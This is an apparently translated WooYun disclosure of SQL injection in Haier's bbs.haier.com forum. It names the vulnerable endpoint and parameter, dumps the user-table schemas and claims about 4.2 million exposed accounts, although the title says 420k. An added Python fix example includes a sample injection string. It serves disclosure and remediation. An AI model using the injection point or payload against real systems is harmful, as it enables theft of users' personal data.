
Vulnerability summary

Defect ID: wooyun-2014-087056

Title: SQL injection in the main Haier forum leaks 420k user records

Vendor: Haier Group

Author: sm0nk

Submitted: 2014-12-13 23:50

Fixed: 2015-01-27 23:52

Published: 2015-01-27 23:52

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: confirmed by the vendor

Source: http://www.wooyun.org. For questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2014-12-13: details sent to the vendor, awaiting vendor action
2014-12-16: vendor has confirmed; details disclosed to the vendor only
2014-12-26: details disclosed to core white hats and domain experts
2015-01-05: details disclosed to regular white hats
2015-01-15: details disclosed to intern white hats
2015-01-27: details disclosed to the public

Brief description:

This is not the same forum as the previously submitted vulnerability; the two forums do not share accounts,
and the data volumes differ:
trs_common_member | 4222429
qwh_members | 73561

Detailed description:

1. The previous submission covered tbbs.haier.com: http://wooyun.org/bugs/wooyun-2014-086690
This one is bbs.haier.com.
2. tbbs has 22 databases;
bbs has 4:

[*] discuz15
[*] information_schema
[*] newdiscuz15
[*] test


3. SQL injection (the injection point is the POST parameter sourceId, a comma-separated list of numeric IDs)

POST /HaierBBS/thrdapplycount/gettolcount.do HTTP/1.1
Content-Length: 125
Content-Type: application/x-www-form-urlencoded
Referer: http://bbs.haier.com/
Cookie: JSESSIONID=FDC54A75489FA666619AA7C8CDF0CB72.jvm1; idsALUserSource=""
Host: bbs.haier.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
sourceId=455767%2C421738%2C415616%2C256510%2C148866%2C148801%2C479712%2C484890%2C484569%2C484595%2C479986%2C484188&type=1


1.jpg


Database: discuz15
Table: uc_members
[13 columns]
+---------------+-------------+
| Column | Type |
+---------------+-------------+
| babao | double |
| email | varchar(96) |
| lastloginip | double |
| lastlogintime | double |
| myid | varchar(90) |
| myidkey | varchar(48) |
| password | varchar(96) |
| regdate | double |
| regip | varchar(45) |
| salt | varchar(18) |
| secques | varchar(24) |
| uid | int(11) |
| username | varchar(45) |
+---------------+-------------+


Database: discuz15
Table: trs_common_member
[40 columns]
+------------------+-----------------------+
| Column | Type |
+------------------+-----------------------+
| accessmasks | tinyint(1) |
| adminid | int(11) |
| adress | varchar(100) |
| allowadmincp | tinyint(1) |
| avatar | varchar(200) |
| avatarstatus | tinyint(1) |
| birthday | varchar(100) |
| city | varchar(100) |
| conisbind | tinyint(1) unsigned |
| credits | int(10) |
| education | varchar(100) |
| educationid | varchar(10) |
| email | varchar(100) |
| emailstatus | tinyint(1) |
| extgroupids | char(20) |
| firstname | varchar(100) |
| gender | int(1) |
| groupexpiry | int(10) unsigned |
| groupid | smallint(6) unsigned |
| lastloginip | varchar(255) |
| lastlogintime | int(10) |
| memcercode | varchar(100) |
| mobile | varchar(255) |
| newpm | smallint(6) unsigned |
| newprompt | smallint(6) unsigned |
| notifysound | tinyint(1) |
| password | char(32) |
| profession | varchar(100) |
| professionid | varchar(10) |
| province | varchar(100) |
| realname | varchar(255) |
| regdate | int(10) unsigned |
| regip | varchar(255) |
| remark | text |
| status | tinyint(1) |
| telephone | varchar(255) |
| timeoffset | char(4) |
| uid | mediumint(8) unsigned |
| username | varchar(50) |
| videophotostatus | tinyint(1) |
+------------------+-----------------------+


4222429 usernames and passwords

2.jpg


4. And an XSS for good measure

bbs-xss.jpg


5. jQuery (an outdated 1.4.2 build is served)
http://bbs.haier.com/was5/web/js/jquery.min.js

/*!
* jQuery JavaScript Library v1.4.2
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Sizzle.js
* http://sizzlejs.com/
* Copyright 2010, The Dojo Foundation
* Released under the MIT, BSD, and GPL Licenses.
*
* Date: Sat Feb 13 22:33:48 2010 -0500
*/


Proof of vulnerability:

1.jpg


2.jpg


bbs-xss.jpg

Fix recommendation:

Filter the input.
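The vulnerable request above passes sourceId as a comma-separated list of IDs and type as a flag. The Python example below is added here and is not part of the original report or of Haier's code (the site itself is a Java application); it shows what "filter the input" should mean in practice for this endpoint: reject anything in sourceId that is not a plain decimal integer before it reaches SQL, and then bind the surviving values into an IN (...) clause with one placeholder per value rather than concatenating them. The table name thread_apply, its columns, the sample rows and the 50-element limit are assumptions made for the demonstration.

```python
import re
import sqlite3
from urllib.parse import parse_qs

# Hypothetical schema: the report shows only the request, not the
# application's real table for this endpoint.
SCHEMA = """
CREATE TABLE thread_apply (id INTEGER, source_id INTEGER, type INTEGER);
"""

# Constructed sample rows for the demo database.
SAMPLE_ROWS = [
    (1, 455767, 1),
    (2, 455767, 1),
    (3, 421738, 1),
    (4, 415616, 2),
    (5, 999999, 1),
]

MAX_IDS = 50  # assumed upper bound on list length per request

_DECIMAL = re.compile(r"[0-9]+")


def parse_source_ids(raw):
    """Turn the comma-separated sourceId value into a list of ints.

    Each element must be a plain ASCII decimal integer; anything else
    (quotes, parentheses, SQL keywords, unicode digits) raises ValueError
    before any SQL text is built.
    """
    ids = []
    for part in raw.split(","):
        part = part.strip()
        if not _DECIMAL.fullmatch(part):
            raise ValueError("sourceId contains a non-numeric element: %r" % part)
        ids.append(int(part))
    if not ids or len(ids) > MAX_IDS:
        raise ValueError("sourceId list is empty or too long")
    return ids


def parse_request_body(body):
    """Parse the x-www-form-urlencoded body into (ids, type)."""
    fields = parse_qs(body, strict_parsing=True)
    ids = parse_source_ids(fields["sourceId"][0])  # KeyError if absent
    type_str = fields.get("type", ["0"])[0]
    if not _DECIMAL.fullmatch(type_str):
        raise ValueError("type must be an integer")
    return ids, int(type_str)


def get_total_count(conn, ids, type_):
    """Count matching rows using a parameterised IN (...) clause.

    Only the number of placeholders depends on the input; the values are
    bound by the driver and never spliced into the SQL string.
    """
    placeholders = ",".join("?" * len(ids))
    sql = ("SELECT COUNT(*) FROM thread_apply "
           "WHERE type = ? AND source_id IN (%s)" % placeholders)
    return conn.execute(sql, [type_] + ids).fetchone()[0]


def handle(conn, body):
    """Return the count for a valid body, or None when the input is rejected."""
    try:
        ids, type_ = parse_request_body(body)
    except (ValueError, KeyError):
        return None
    return get_total_count(conn, ids, type_)


def make_demo_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO thread_apply VALUES (?,?,?)", SAMPLE_ROWS)
    return conn


if __name__ == "__main__":
    conn = make_demo_db()
    legit = "sourceId=455767%2C421738%2C415616&type=1"
    print("legitimate request ->", handle(conn, legit))
    # Constructed malformed value: the closing parenthesis and keyword
    # fail the integer check, so the request is refused before any query runs.
    bad = "sourceId=455767%2C1)%20OR%201%3D1--&type=1"
    print("malformed request ->", handle(conn, bad))
```

Rejecting at the parser and binding at the query are two separate layers on purpose: the allow-list keeps garbage out of the application logic, and the placeholders mean that even a value that slips past validation is still treated as data by the database driver.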

Copyright notice: please credit the source, sm0nk@WooYun, when reposting.


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2014-12-16 17:49

Vendor reply:

Thanks to sm0nk of the WooYun platform for the testing and the heads-up; we have assigned staff to handle it.
After the tbbs vulnerability was reported we also fixed this bbs vulnerability at the same time. Still High, I suppose, rank 10.

Latest status:

None yet